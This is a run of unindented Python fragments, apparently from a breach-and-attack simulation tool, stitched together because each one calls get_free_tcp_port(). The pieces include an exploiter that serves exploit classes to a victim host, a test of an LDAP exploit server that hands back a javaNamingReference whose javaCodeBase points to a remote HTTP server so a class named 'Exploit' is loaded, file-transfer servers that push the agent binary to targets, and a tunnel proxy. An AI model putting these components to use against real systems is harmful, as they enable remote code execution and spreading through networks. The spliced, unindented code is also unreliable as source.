def __init__(self, host: VictimHost):
super().__init__(host)
self._ldap_port = get_free_tcp_port()
self._class_http_server_ip = get_interface_to_target(self.host.ip_addr)
self._class_http_server_port = get_free_tcp_port()
self._ldap_server = None
self._exploit_class_http_server = None
self._agent_http_server_thread = None
self._open_ports = [
int(port[0]) for port in WebRCE.get_open_service_ports(
self.host, self.HTTP, ["http"])
]
def create_locked_transfer(host, src_path, local_ip=None, local_port=None):
"""
Create http server for file transfer with a lock
:param host: Variable with target's information
:param src_path: Monkey's path on current system
:param local_ip: IP where to host server
:param local_port: Port at which to host monkey's download
:return: Server address in http://%s:%s/%s format and LockedHTTPServer handler
"""
# To avoid race conditions we pass a locked lock to http servers thread
lock = Lock()
lock.acquire()
if not local_port:
local_port = get_free_tcp_port()
if not local_ip:
local_ip = get_interface_to_target(host.ip_addr)
if not firewall.listen_allowed():
LOG.error(
"Firewall is not allowed to listen for incomming ports. Aborting"
)
return None, None
httpd = LockedHTTPServer(local_ip, local_port, src_path, lock)
httpd.start()
lock.acquire()
return "http://%s:%s/%s" % (local_ip, local_port,
urllib.parse.quote(
os.path.basename(src_path))), httpd
def test_ldap_server(tmp_path):
http_ip = "172.10.20.30"
http_port = 9999
ldap_port = get_free_tcp_port()
ldap_server = LDAPExploitServer(ldap_port, http_ip, http_port, tmp_path)
ldap_server.run()
server = Server(host="127.0.0.1", port=ldap_port)
conn = Connection(server, auto_bind=True)
conn.search(
search_base=EXPLOIT_RDN,
search_filter="(objectClass=*)",
search_scope=BASE,
attributes=ALL_ATTRIBUTES,
)
assert len(conn.response) == 1
attributes = conn.response[0]["attributes"]
assert attributes.get("objectClass", None) == ["javaNamingReference"]
assert attributes.get("javaClassName", None) == ["Exploit"]
assert attributes.get("javaCodeBase",
None) == [f"http://{http_ip}:{http_port}/"]
assert attributes.get("javaFactory", None) == ["Exploit"]
ldap_server.stop()
def run(self):
self._broad_sock = _set_multicast_socket(self._timeout)
self.l_ips = local_ips()
self.local_port = get_free_tcp_port()
if not self.local_port:
return
if not firewall.listen_allowed(localport=self.local_port):
LOG.info("Machine firewalled, listen not allowed, not running tunnel.")
return
proxy = self._proxy_class(local_port=self.local_port, dest_host=self._target_addr, dest_port=self._target_port)
LOG.info("Running tunnel using proxy class: %s, listening on port %s, routing to: %s:%s",
proxy.__class__.__name__,
self.local_port,
self._target_addr,
self._target_port)
proxy.start()
while not self._stopped:
try:
search, address = self._broad_sock.recvfrom(BUFFER_READ)
if '?' == search:
ip_match = get_close_matches(address[0], self.l_ips) or self.l_ips
if ip_match:
answer = '%s:%d' % (ip_match[0], self.local_port)
LOG.debug("Got tunnel request from %s, answering with %s", address[0], answer)
self._broad_sock.sendto(answer, (address[0], MCAST_PORT))
elif '+' == search:
if not address[0] in self._clients:
LOG.debug("Tunnel control: Added %s to watchlist", address[0])
self._clients.append(address[0])
elif '-' == search:
LOG.debug("Tunnel control: Removed %s from watchlist", address[0])
self._clients = [client for client in self._clients if client != address[0]]
except socket.timeout:
continue
LOG.info("Stopping tunnel, waiting for clients: %s" % repr(self._clients))
# wait till all of the tunnel clients has been disconnected, or no one used the tunnel in QUIT_TIMEOUT seconds
while self._clients and (time.time() - get_last_serve_time() < QUIT_TIMEOUT):
try:
search, address = self._broad_sock.recvfrom(BUFFER_READ)
if '-' == search:
LOG.debug("Tunnel control: Removed %s from watchlist", address[0])
self._clients = [client for client in self._clients if client != address[0]]
except socket.timeout:
continue
LOG.info("Closing tunnel")
self._broad_sock.close()
proxy.stop()
proxy.join()
def _start_http_server(self):
"""
Starts custom http server that waits for GET requests
:return: httpd (IndicationHTTPServer daemon object handler), lock (acquired lock)
"""
lock = threading.Lock()
local_port = get_free_tcp_port()
local_ip = get_interface_to_target(self.host.ip_addr)
httpd = self.IndicationHTTPServer(local_ip, local_port, lock)
lock.acquire()
httpd.start()
lock.acquire()
return httpd, lock
def create_transfer(host, src_path, local_ip=None, local_port=None):
if not local_port:
local_port = get_free_tcp_port()
if not local_ip:
local_ip = get_interface_to_target(host.ip_addr)
if not firewall.listen_allowed():
return None, None
httpd = HTTPServer(local_ip, local_port, src_path)
httpd.daemon = True
httpd.start()
return "http://%s:%s/%s" % (local_ip, local_port,
urllib.parse.quote(
os.path.basename(src_path))), httpd
def port():
return get_free_tcp_port()
